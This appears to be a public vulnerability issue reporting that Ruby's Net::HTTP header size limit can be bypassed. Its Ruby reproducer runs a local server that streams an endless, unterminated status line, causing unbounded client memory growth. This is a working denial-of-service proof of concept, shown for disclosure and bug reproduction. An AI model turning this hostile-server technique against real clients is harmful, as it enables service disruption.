We received a vulnerability report that the request header size limit is not truly effective. This reproducer still shows unbound memory growth:
require "socket"
require "net/http"
Thread.new do
s = TCPServer.new("127.0.0.1", 18080)
c = s.accept
c.write("HTTP/1.1 200 ") # deliberately missing newline
loop { c.write("A" * 16_384) } # continuous stream, no terminator
end
sleep 0.1
Net::HTTP.get(URI("http://127.0.0.1:18080/"))
As #219 was not treated as a vulnerability, I'm filing this issue publicly, too.
Report: AISLE-Report-PSIRTSUPT-15870.md
We received a vulnerability report that the request header size limit is not truly effective. This reproducer still shows unbound memory growth:
As #219 was not treated as a vulnerability, I'm filing this issue publicly, too.
Report: AISLE-Report-PSIRTSUPT-15870.md